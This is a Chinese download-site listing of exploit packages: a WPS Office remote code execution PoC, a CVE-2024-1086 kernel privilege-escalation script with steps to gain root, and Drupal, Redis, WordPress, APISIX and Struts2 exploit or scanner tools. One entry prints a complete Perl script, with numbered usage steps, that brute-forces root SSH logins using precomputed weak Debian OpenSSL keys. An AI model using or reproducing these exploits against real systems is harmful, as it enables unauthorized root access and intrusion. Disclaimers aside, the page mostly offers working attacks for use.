金山WPS是一款办公软件套件,类似于Microsoft Office,用于创建、编辑和分享文档。它支持多种文件格式,包括Word、Excel、PowerPoint等,并提供了丰富的功能和工具,方便用户进行文档处理、表格制作和演示文稿设计等操作。 攻击者可能会利用WPS中的漏洞,通过远程代码执行的方式在受害者的计算机上执行恶意代码。这意味着攻击者可以在受害者的计算机上安装恶意软件、窃取个人信息或进行其他恶意活动。 金山WPS远程代码执行是一种严重的安全威胁,需要采取措施来防范和应对。用户应该保持WPS软件的更新,并定期检查安全补丁和漏洞修复程序。同时,用户还应该加强网络安全意识,不随意打开未知来源的链接或文件,避免点击恶意广告或下载恶WPS For Windows 部分版本存在远程代码执行漏洞,攻击者可利用该漏洞在受害者目标主机上执行任意代码,控制主机等。 影响版本:WPS Office 2023 个人版 低于12.1.0.15120(含) WPS Office机构版本(如专业版、专业增强版) 低于11.8.2.12055(含) 注:里面包含存在漏洞的应用和poc文件。漏洞说明
2024-07-01 10:55:07 225.44MB 网络安全
1
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
2024-06-13 15:30:22 165KB linux
1
这里实现这个漏洞的复现。大家可以参考参考,这是老师要做的一个题目。
2023-05-02 20:39:44 2.42MB 漏洞复现
1
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。文章目录一.ph
2023-03-30 14:20:57 2.23MB 网络安全 安全 软件/插件 sql
1
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)_POC 此POC是我用于vulhub复现的,可以先看我文章再下载
1
redis未授权漏洞vulhub靶场复现
2023-02-11 18:02:27 498KB redis 漏洞复现 安全漏洞
1
CVE-2017-1002008 WordPress Plugin 允许通过参数调用文件下载漏洞复现 。包中有漏洞复现所需软件安装包和poc;python脚本
2023-01-03 11:00:31 154.79MB CVE-2017-1002008 WordPressPlugin poc python脚本
1
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit 解开Debian OpenSSL内的ssh钥匙只有65.536可能性,导致唯一的熵是引起钥匙的过程的Pid. 这导致以下perl脚本程序可以使用与暴力的预先计算好的ssh钥匙。如果钥匙在一个非被修补的debian或其他系统指南被安装配置,它就会运作。 在一个未修补的系统中,不需要Debian,做以下工作: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 2. 提取它对应目录 3. 输入/root/.ssh/authorized_keys与2048位的SSH RSA钥匙,引起在Upatched Debian (这是这盘剥将增殖比的钥匙 eak) 4. 运行perl脚本程序并且给它提取bzip2的位置. CODE: #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; print "By hack01[at]live[dot]cn\n"; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die("opendir"); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) > $keysPerConnect) { system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]); @a = (); } } 5. 在几分钟(少于20分钟)以后享受胜利结果吧!
2022-12-05 15:02:46 47.9MB 漏洞复现
1
CVE-2020-13945检测脚本 给出脚本,可自查是否存在漏洞 APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,攻击者利用默认的管理员Token访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行
1
struts2综合利用工具.zip struts2综合利用工具可检测 S2-005 S2-009 S2-013 等等 struts2 相关漏洞 声明:工具仅供安全检测或网络攻防研究,非法用途后果自负. 声明:工具仅供安全检测或网络攻防研究,非法用途后果自负. .
1